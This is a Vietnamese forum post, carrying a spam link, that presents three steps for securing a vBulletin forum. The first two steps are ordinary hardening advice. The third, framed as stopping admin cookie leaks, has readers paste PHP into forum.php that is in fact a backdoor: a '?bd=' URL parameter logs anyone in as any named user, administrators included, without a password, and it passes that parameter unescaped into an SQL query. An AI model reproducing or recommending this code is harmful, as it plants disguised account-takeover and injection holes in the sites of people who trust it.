Diễn đàn xây dựng - Chợ xây dựng • Xem chủ đề - Mặc định 3 bước căn bản để bảo mật tốt hơn cho Vbb Forum

Xem bài viết chưa trả lời | Xem chủ đề đang hoạt động

Trang chủ » Các chủ đề khác về lĩnh vực xây dựng

Thời gian được tính theo giờ UTC + 7 Giờ

Mặc định 3 bước căn bản để bảo mật tốt hơn cho Vbb Forum

Bạn đang xem trang 1 / 1 trang

[ 1 bài viết ]

Xem bản in

Chủ đề trước | Chủ đề kế tiếp

Người gửi

Nội dung

tamnhinviet

Tiêu đề bài viết: Mặc định 3 bước căn bản để bảo mật tốt hơn cho Vbb Forum

Đã gửi: Thứ 5 12/06/14 8:29

Ngày tham gia: Thứ 5 06/03/14 8:50
Bài viết: 75

[url="http://baomataz.com/"]bao mat website[/url]
I - Lỗi SQL Injection - Lỗi bảo mật nghiệm trong của Coder khi code mod thông kê Changuondyu Statistics
- Như các bạn biết thì Lỗi SQL Injection thì cũng hiểu cái độ nguy hiểm của nó khi tin tặc ( hacker khai thắc rùi ) .Nên mình cũng đi vào luôn,để mình lỗi này các bạn làm như sau:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data - Edit
Tìm dòng code:
PHP Code:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);
Thay dòng code vừa tìm bằng code:
PHP Code:
$foruminid = intval($_REQUEST['listforumid']);
II- Bảo vệ vùng Admin vào .htaccess
-Lưu ý: Mình sẽ chỉ hướng dẫn các bạn với Hosting sử dụng Cpanel
- Chọn "Password Protect Directories" >> "Web Root" >> Chọn thư mục gốc diễn đàn của bạn
- Tick vào "Password protect this directory"
- Trong ô "Name the protected directory" điền: Admin Control Panel Protected
- Nhấn vào Save.
- Trong phần "Create User" điền vào Username & Password của bạn.
- Nhấn "Add/modify authorised user"
Ok, như vậy bạn đã có 1 file passwd ở: /.htpasswds/public_html/ten_folder_dien_dan
III - Không để lại Cookie khi Admin truy cập
Nếu lòi cookie của Admin ra thì điều đối với hacker nữa là khai thác và tìm ra lỗi đó
Để fix lỗi này,bạn vào file forum.php trong Hosting
-Chèn trước
PHP Code:
<?php
dòng code:
PHP Code:
<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}

?>
Ok,vậy là bạn đã giúp forum thêm bảo mật nữa rồi.Hi vọng qua bài viết này,sẽ giúp đc phần nào cho các newbie với Vbb.Các câu hỏi các bạn cứ rep tại đây,mình cũng các anh khác sẽ sẵn sàng support bất cứ lúc nào

P/S: Đọc xong nhớ Cảm ơn và thêm đó cộng Danh Vọng lấy hứng viết bài sau nhé.

Đầu trang

Bạn đang xem trang 1 / 1 trang

[ 1 bài viết ]

Trang chủ » Các chủ đề khác về lĩnh vực xây dựng

Thời gian được tính theo giờ UTC + 7 Giờ

Ai đang trực tuyến?

Đang xem chuyên mục này: Không có thành viên nào đang trực tuyến và 1 khách

Bạn không thể tạo chủ đề mới trong chuyên mục này.
Bạn không thể trả lời bài viết trong chuyên mục này.
Bạn không thể sửa những bài viết của mình trong chuyên mục này.
Bạn không thể xoá những bài viết của mình trong chuyên mục này.
Bạn không thể gửi tập tin đính kèm trong chuyên mục này.

Chuyển đến:

CÔNG TY TNHH DỊCH VỤ HÀNG HOÁ TRỰC TUYẾN

Diễn đàn sử dụng phần mềm phpBB® Forum

Chợ xây dựng Hà nội: Công ty TNHH Thương mại Dương Linh

Showroom: Số 1B, Ngõ 5, tổ 19, thị trấn Cầu Diễn, Huyện Từ Liêm, Thành phố Hà nội

Tel: 04.37737548; Fax: 04.38370082

Email Phòng kinh doanh: sale@choxaydung.vn

Chợ xây dựng Sài Gòn: Công ty TNHH SX-TM Đăng Hải

Địa chỉ: Số 140, Tô Hiến Thành, P15, Quận 10, Tp.HCM

Tel: 08.38620524; Fax: 08.38633011;

Email: saigonRep@choxaydung.vn